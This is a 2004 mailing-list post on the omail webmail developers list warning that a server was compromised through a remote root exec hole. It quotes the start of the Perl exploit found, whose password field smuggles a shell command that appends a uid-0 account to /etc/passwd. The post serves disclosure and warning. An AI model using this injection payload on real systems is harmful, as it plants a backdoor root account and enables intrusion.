Re: [Omail-devel] [Fwd: remote root exec vulnerability in omail] - exploit around
Brought to you by:
swix
Menu
▾
▴
Re: [Omail-devel] [Fwd: remote root exec vulnerability in omail] - exploit around
|
From: Olivier M. <om-...@om...> - 2004-05-18 16:54:26
|
On Fri, 2004-05-07 at 17:02 +0200, Olivier Mueller wrote: > FYI, a patch would be required, but I have absolutely no time > to work on that the next hours. Carter, would you have some? I've got a server turned down with an omail-webmail exploit today, crazy to see that there are people which have nothing better to do than mess with other ppl's servers :( beginning of the code: ------------------------------------------------------------------ #!/usr/bin/perl use IO::Socket; $target = $ARGV[0] || 'whitehat.com/cgi-sbin/omail.pl'; if($target =~ /^(http:\/\/)*(.*?\/)(.*)$/i){ $getline = '/'.$3; $host = $2; $host =~ s/\/$//; } #setup action, userid, password $getline .= '?action=login&userid=xxx%40me.com&password='; $getline1 = $getline . '`echo%20%27qmailiq:x:0:0::%2ftmp:%2fbin%2fbash%27>>%2fetc%2fpasswd`'; [...] ----------------------------------------------------------------------- So if you still have some omail webmail running, you'd better turn it off for the moment. Olivier |